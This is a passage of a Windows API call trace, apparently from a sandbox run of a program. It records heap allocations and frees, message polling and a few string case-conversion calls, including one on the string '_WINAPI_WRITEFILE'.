HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd888 | out: hHeap=0x8a0000) returned 1 [0178.815] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd930 | out: hHeap=0x8a0000) returned 1 [0178.815] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba168 | out: hHeap=0x8a0000) returned 1 [0178.815] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd378 | out: hHeap=0x8a0000) returned 1 [0178.815] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c0b78 | out: hHeap=0x8a0000) returned 1 [0178.815] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2758 | out: hHeap=0x8a0000) returned 1 [0178.815] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0178.815] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2758 [0178.815] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20a) returned 0x8e8808 [0178.815] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c26b8 [0178.815] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e8808 | out: hHeap=0x8a0000) returned 1 [0178.815] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c26b8 | out: hHeap=0x8a0000) returned 1 [0178.815] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c26b8 [0178.815] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2678 [0178.815] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x18) returned 0x90d440 [0178.815] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2788 [0178.816] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2788 | out: hHeap=0x8a0000) returned 1 [0178.816] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2788 [0178.816] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x18) returned 0x90d4a0 [0178.816] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2788 | out: hHeap=0x8a0000) returned 1 [0178.816] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2678 | out: hHeap=0x8a0000) returned 1 [0178.816] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x90d4a0 | out: hHeap=0x8a0000) returned 1 [0178.816] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x90d440 | out: hHeap=0x8a0000) returned 1 [0178.816] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c26b8 | out: hHeap=0x8a0000) returned 1 [0178.816] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2758 | out: hHeap=0x8a0000) returned 1 [0178.816] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0178.816] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2758 [0178.816] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c26b8 [0178.816] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c26b8 | out: hHeap=0x8a0000) returned 1 [0178.816] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2758 | out: hHeap=0x8a0000) returned 1 [0178.817] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8db138 | out: hHeap=0x8a0000) returned 1 [0178.817] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9b9fa0 | out: hHeap=0x8a0000) returned 1 [0178.817] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8def88 | out: hHeap=0x8a0000) returned 1 [0178.817] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1770 | out: hHeap=0x8a0000) returned 1 [0178.817] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8defb0 | out: hHeap=0x8a0000) returned 1 [0178.817] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba330 | out: hHeap=0x8a0000) returned 1 [0178.817] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bda98 | out: hHeap=0x8a0000) returned 1 [0178.817] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1aa0 | out: hHeap=0x8a0000) returned 1 [0178.817] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8ded58 | out: hHeap=0x8a0000) returned 1 [0178.817] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd348 | out: hHeap=0x8a0000) returned 1 [0178.817] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8debc8 | out: hHeap=0x8a0000) returned 1 [0178.817] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1890 | out: hHeap=0x8a0000) returned 1 [0178.817] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8df028 | out: hHeap=0x8a0000) returned 1 [0178.817] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd558 | out: hHeap=0x8a0000) returned 1 [0178.817] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd540 | out: hHeap=0x8a0000) returned 1 [0178.817] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2698 | out: hHeap=0x8a0000) returned 1 [0178.817] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8ded30 | out: hHeap=0x8a0000) returned 1 [0178.817] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bdb10 | out: hHeap=0x8a0000) returned 1 [0178.817] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd960 | out: hHeap=0x8a0000) returned 1 [0178.817] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2738 | out: hHeap=0x8a0000) returned 1 [0178.817] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8dedd0 | out: hHeap=0x8a0000) returned 1 [0178.817] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd828 | out: hHeap=0x8a0000) returned 1 [0178.817] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd570 | out: hHeap=0x8a0000) returned 1 [0178.817] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2628 | out: hHeap=0x8a0000) returned 1 [0178.817] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8deda8 | out: hHeap=0x8a0000) returned 1 [0178.817] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd468 | out: hHeap=0x8a0000) returned 1 [0178.817] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8deec0 | out: hHeap=0x8a0000) returned 1 [0178.817] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1a00 | out: hHeap=0x8a0000) returned 1 [0178.817] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8dee70 | out: hHeap=0x8a0000) returned 1 [0178.817] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd9d8 | out: hHeap=0x8a0000) returned 1 [0178.818] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd918 | out: hHeap=0x8a0000) returned 1 [0178.818] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8dec68 | out: hHeap=0x8a0000) returned 1 [0178.818] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1a30 | out: hHeap=0x8a0000) returned 1 [0178.818] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8df0c8 | out: hHeap=0x8a0000) returned 1 [0178.818] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bda20 | out: hHeap=0x8a0000) returned 1 [0178.818] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd3f0 | out: hHeap=0x8a0000) returned 1 [0178.818] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1b50 | out: hHeap=0x8a0000) returned 1 [0178.818] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8dead8 | out: hHeap=0x8a0000) returned 1 [0178.818] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd9a8 | out: hHeap=0x8a0000) returned 1 [0178.818] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba378 | out: hHeap=0x8a0000) returned 1 [0178.818] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2828 | out: hHeap=0x8a0000) returned 1 [0178.818] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8df140 | out: hHeap=0x8a0000) returned 1 [0178.818] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba138 | out: hHeap=0x8a0000) returned 1 [0178.818] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e6e48 | out: hHeap=0x8a0000) returned 1 [0178.818] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2748 | out: hHeap=0x8a0000) returned 1 [0178.818] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bdab0 | out: hHeap=0x8a0000) returned 1 [0178.818] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd4f8 | out: hHeap=0x8a0000) returned 1 [0178.818] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd8d0 | out: hHeap=0x8a0000) returned 1 [0178.818] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd588 | out: hHeap=0x8a0000) returned 1 [0178.818] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd420 | out: hHeap=0x8a0000) returned 1 [0178.818] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd4e0 | out: hHeap=0x8a0000) returned 1 [0178.818] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba0d8 | out: hHeap=0x8a0000) returned 1 [0178.818] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd8b8 | out: hHeap=0x8a0000) returned 1 [0178.818] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8ded80 | out: hHeap=0x8a0000) returned 1 [0178.818] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e83b8 | out: hHeap=0x8a0000) returned 1 [0178.818] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c26d8 | out: hHeap=0x8a0000) returned 1 [0178.818] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd630 | out: hHeap=0x8a0000) returned 1 [0178.818] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9b9b68 | out: hHeap=0x8a0000) returned 1 [0178.819] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2618 | out: hHeap=0x8a0000) returned 1 [0178.819] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8decb8 | out: hHeap=0x8a0000) returned 1 [0178.819] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba408 | out: hHeap=0x8a0000) returned 1 [0178.819] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e18c0 | out: hHeap=0x8a0000) returned 1 [0178.819] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1b70 | out: hHeap=0x8a0000) returned 1 [0178.819] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1d30 | out: hHeap=0x8a0000) returned 1 [0178.819] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8dec90 | out: hHeap=0x8a0000) returned 1 [0178.819] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd3a8 | out: hHeap=0x8a0000) returned 1 [0178.819] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba078 | out: hHeap=0x8a0000) returned 1 [0178.819] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd408 | out: hHeap=0x8a0000) returned 1 [0178.819] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bda80 | out: hHeap=0x8a0000) returned 1 [0178.819] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8ded08 | out: hHeap=0x8a0000) returned 1 [0178.819] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e18f0 | out: hHeap=0x8a0000) returned 1 [0178.819] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8ded08 [0178.819] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bda80 [0178.819] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e18f0 [0178.819] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd408 [0178.819] PeekMessageW (in: lpMsg=0x87f36c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f36c) returned 0 [0178.819] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1d30 [0178.819] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x30) returned 0x9bf310 [0178.819] CharUpperBuffW (in: lpsz="_WINAPI_WRITEFILE", cchLength=0x11 | out: lpsz="_WINAPI_WRITEFILE") returned 0x11 [0178.819] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bf310 | out: hHeap=0x8a0000) returned 1 [0178.819] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1d30 | out: hHeap=0x8a0000) returned 1 [0178.819] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8dec90 [0178.819] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x1) returned 0x8e1d30 [0178.819] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8decb8 [0178.819] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba078 [0178.819] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1b70 [0178.819] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1b70 | out: hHeap=0x8a0000) returned 1 [0178.820] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x1) returned 0x8e1b70 [0178.820] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd3a8 [0178.820] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e18c0 [0178.820] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8ded80 [0178.820] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba408 [0178.820] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1b50 [0178.820] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x14) returned 0x90d440 [0178.820] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x24) returned 0x8dc168 [0178.820] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9b9b68 [0178.820] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1a30 [0178.820] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1b50 | out: hHeap=0x8a0000) returned 1 [0178.820] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9b9b68 | out: hHeap=0x8a0000) returned 1 [0178.820] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1a30 | out: hHeap=0x8a0000) returned 1 [0178.820] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8dc168 | out: hHeap=0x8a0000) returned 1 [0178.820] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x90d440 | out: hHeap=0x8a0000) returned 1 [0178.820] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba408 | out: hHeap=0x8a0000) returned 1 [0178.820] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8ded80 | out: hHeap=0x8a0000) returned 1 [0178.820] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e18c0 | out: hHeap=0x8a0000) returned 1 [0178.820] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x1) returned 0x8e18c0 [0178.820] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba408 [0178.820] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1a30 [0178.820] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1a30 | out: hHeap=0x8a0000) returned 1 [0178.820] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x1) returned 0x8e1a30 [0178.820] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9b9b68 [0178.820] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0xc) returned 0x9bd630 [0178.820] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8ded80 [0178.820] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd8b8 [0178.821] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1b50 [0178.821] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba0d8 [0178.821] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8df140 [0178.821] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd4e0 [0178.821] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1a00 [0178.821] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd420 [0178.821] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8dead8 [0178.821] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd588 [0178.821] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1890 [0178.821] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd588 | out: hHeap=0x8a0000) returned 1 [0178.821] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8df0c8 [0178.821] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd588 [0178.821] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8dec68 [0178.821] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd8d0 [0178.821] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1aa0 [0178.821] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd8d0 | out: hHeap=0x8a0000) returned 1 [0178.821] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8dee70 [0178.821] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1770 [0178.821] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1770 | out: hHeap=0x8a0000) returned 1 [0178.821] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8deec0 [0178.821] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd8d0 [0178.821] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1770 [0178.821] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd8d0 | out: hHeap=0x8a0000) returned 1 [0178.821] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8deda8 [0178.821] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd8d0 [0178.821] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x40) returned 0x8db138 [0178.821] PeekMessageW (in: lpMsg=0x87f114, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f114) returned 0 [0178.821] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8dedd0 [0178.822] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd4f8 [0178.822] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2618 [0178.822] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bdab0 [0178.822] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba138 [0178.822] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c26d8 [0178.822] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba138 | out: hHeap=0x8a0000) returned 1 [0178.822] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8ded30 [0178.822] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba138 [0178.822] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2748 [0178.822] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba378 [0178.822] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2748 | out: hHeap=0x8a0000) returned 1 [0178.822] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd9a8 [0178.822] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2748 [0178.822] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd3f0 [0178.822] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2748 | out: hHeap=0x8a0000) returned 1 [0178.822] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bda20 [0178.822] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2748 [0178.822] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd918 [0178.822] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2748 | out: hHeap=0x8a0000) returned 1 [0178.822] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd9d8 [0178.822] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2748 [0178.822] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd468 [0178.822] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2748 | out: hHeap=0x8a0000) returned 1 [0178.822] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd570 [0178.822] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2748 [0178.823] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2748 | out: hHeap=0x8a0000) returned 1 [0178.823] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd828 [0178.823] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2748 [0178.823] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd960 [0178.823] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2748 | out: hHeap=0x8a0000) returned 1 [0178.823] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bdb10 [0178.823] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2748 [0178.823] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2748 | out: hHeap=0x8a0000) returned 1 [0178.823] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd540 [0178.823] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2748 [0178.823] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd558 [0178.823] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2748 | out: hHeap=0x8a0000) returned 1 [0178.823] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x40) returned 0x8db180 [0178.823] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8ded30 | out: hHeap=0x8a0000) returned 1 [0178.823] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd348 [0178.823] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2748 [0178.823] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2748 | out: hHeap=0x8a0000) returned 1 [0178.823] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bda98 [0178.823] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2748 [0178.823] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba330 [0178.823] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2748 | out: hHeap=0x8a0000) returned 1 [0178.823] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9b9fa0 [0178.823] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2748 [0178.823] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2748 | out: hHeap=0x8a0000) returned 1 [0178.823] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd378 [0178.823] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2748 [0178.823] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba168 [0178.824] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2748 | out: hHeap=0x8a0000) returned 1 [0178.824] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd930 [0178.824] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2748 [0178.824] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2748 | out: hHeap=0x8a0000) returned 1 [0178.824] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2748 [0178.824] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd888 [0178.824] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0178.824] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd8e8 [0178.824] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2828 [0178.824] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2628 [0178.824] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd858 [0178.824] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd8e8 | out: hHeap=0x8a0000) returned 1 [0178.824] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2828 | out: 